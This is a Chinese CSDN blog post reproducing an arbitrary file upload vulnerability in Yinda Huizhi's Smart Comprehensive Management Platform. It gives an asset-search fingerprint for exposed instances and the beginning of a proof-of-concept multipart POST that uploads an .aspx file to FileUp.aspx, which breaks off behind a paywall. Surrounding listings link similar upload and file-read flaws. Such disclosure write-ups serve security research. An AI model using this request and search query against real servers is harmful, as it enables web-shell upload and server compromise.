【漏洞复现】银达汇智智慧综合管理平台任意文件上传漏洞

已于 2024-01-18 10:26:58 修改
阅读量540 收藏 9
点赞数 10
文章标签: web安全
于 2024-01-18 10:19:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/135667264
版权
【漏洞复现】 专栏收录该内容
146 篇文章 1 订阅

已下架不支持订阅

福建银达汇智公司的智慧综合管理平台FileUpPage存在安全漏洞,允许攻击者上传任意文件。漏洞复现可通过特定POC实现,建议联系厂商修复。
摘要由CSDN通过智能技术生成

Nx01 产品简介

        福建银达汇智信息科技股份有限公司成立于2009年,位于福建省福州市,是一家以从事软件和信息技术服务业为主的企业。

Nx02 漏洞描述

        银达汇智智慧综合管理平台 FileUpPage 存在任意文件上传漏洞,攻击者通过漏洞可上传任意文件至服务器。

Nx03 产品主页

hunter-query: "汇智信息" && title=="智慧综合管理平台登入"

Nx04 漏洞复现

POC:

POST /Module/FileUpPage/FileUp.aspx?orgid=1&type=NNewsContent HTTP/1.1
Host: {
  {Hostname}}
Accept-Encoding: identity
Content-Length: 337
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9

--62907949903a4c499178971c9dab4ad9
Content-Disposition: form-data; name="Filedata"; filename="abc.aspx"
了解本专栏 已下架不支持订阅
晚风不及你ღ
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录

已下架不支持订阅

漏洞复现银达汇智智慧综合管理平台任意文件读取漏洞
晚风不及你
01-18 405
福建银达汇智信息科技股份有限公司成立于2009年,位于福建省福州市,是一家以从事软件和信息技术服务业为主的企业。
银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
weixin_46801402的博客
11-17 597
银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
智慧校园(安校易)管理系统Module接口存在任意文件上传漏洞
weixin_43167326的博客
05-27 991
安校易”是银达云创公司基于多年教育市场信息化建设经验沉淀,经过充分的客户需求调研,并依据国家“十三五”教育信息化建设规范而推出的综合互联网+教育信息化解决方案。“安校易”以物联网技术为基础,以学生在校“学食住行”管理为中心,将消费管理、门禁管理、各类学生出入管理、家校互通、校门口进出身份识别等系统进行集成,有效减少校园管理盲点,提升校园安全防范与管理水平。福州银达云创信息科技有限公司智慧校园(安校易)管理系统存在任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞复现
0xSec
05-24 870
智慧校园(安校易)管理系统 FileUpProductupdate.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
漏洞复现智慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传漏洞
凝聚力安全团队
06-28 425
智慧校园(安校易)管理系统 FileUpProductupdate.aspx 接口处存在任意文件上传漏洞,未经过身份认证的远程攻击者可利用此漏洞上传任意文件,最终可导致服务器失陷。
银达汇智服务器修改金额,一键自助刷脸支付 银达智慧食堂上线
weixin_30375113的博客
08-10 500
人脸识别适合局域网场景做起中国的人脸识别技术,已经是世界前沿;硬件技术的局域网环境场景化使用已经得到安全验证。在局域网如校园、企业园区、办公楼宇等场景,考勤、门禁、通道通行、内部餐厅消费记账等应用需要下,人脸识别的价值还是非常明显。当我们忘记带卡、忘记手机、忘记证件等,刷脸就能解决通行考勤消费等系列问题,这还是非常有实用价值和现实价值的。在校园环境,济南银达世纪智能科技的”银达汇智“人脸识别考勤一...
智慧校园(安校易)管理系统 FileUpAd.aspx 文件上传致RCE漏洞复现
0xSec
08-13 499
智慧校园(安校易)管理系统 FileUpAd.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
银达信息:2019年年度报告.PDF
05-10
银达信息2019年年度报告】是福建银达汇智信息科技股份有限公司对外公开的年度财务和运营总结,报告详细阐述了公司在2019年的各项关键数据和业绩表现。以下为报告中的主要知识点: 1. **公司概述**:银达信息,...
银达服饰授信调查报告.doc
09-19
银达服饰授信调查报告】涉及的知识点包括: 1. **企业信用评估**:银达服饰在武汉农村商业银行江汉支行申请160万元流动资金授信,期限一年,以其法定代表人尹四菊的私有房产作为抵押。这涉及到金融机构对企业信用...
银达一期定价方案2.pptx
11-12
银达一期定价方案2.pptx】是一个关于房地产定价策略的报告,主要涉及高淳市场的住宅项目。报告深入分析了市场背景、定价策略、销售目标及市场难点,旨在为银达一期项目的定价提供决策依据。 一、市场背景分析 1. ...
公司文件服务器FTP.pdf
05-28
本文主要介绍的是银达润和公司内部使用的FTP文件服务器,旨在规范公司内部文件的存储、提取、交换以及对外临时文件传输操作,以确保公司的管理制度、业务资料的安全和高效流转。 一、概述 1.1 目的 1) 文件服务器...
公司文件服务器FTP..doc
06-07
【公司文件服务器FTP使用说明】 本说明旨在指导银达润和公司的全体员工正确使用公司...通过遵循这些规定和指南,银达润和公司的文件服务器FTP将成为一个安全、高效的信息交流平台,促进内部协作和业务流程的顺畅进行。
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 683
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1107
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
2024年杭州市网络与信息安全管理员(网络安全管理员)职业技能竞赛的通知
Geek极安云科-致力于网络安全事业
08-16 632
竞赛由理论知识和操作技能两部分组成,均采用百分制,小数点后保留两位,60分(含)以上为合格。荣获竞赛一等奖、二等奖的选手,由杭州市人力社保局认定为“杭州市技术能手”,若有不符合认定条件的选手,不再递补;本次竞赛依据《网络与信息安全管理员(网络安全管理员)国家职业技能标准》三级(高级工)等级要求确定技术标准,编制技术文件和命题,适当增加相关新知识、新技术、新技能等内容。1.各区、县(市),有关产业工会,要高度重视此次竞赛,积极发动、广泛宣传、认真组织、严格选拔,推荐综合素质较好、技能水平较高的人员参赛。
【网络安全漏洞挖掘:IDOR实例
等风来
08-19 100
点击Documents > Download后,应用程序将执行 HTTP GET 请求
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-20 346
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
Web安全:SqlMap工具
qq_55038440的博客
08-16 1064
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值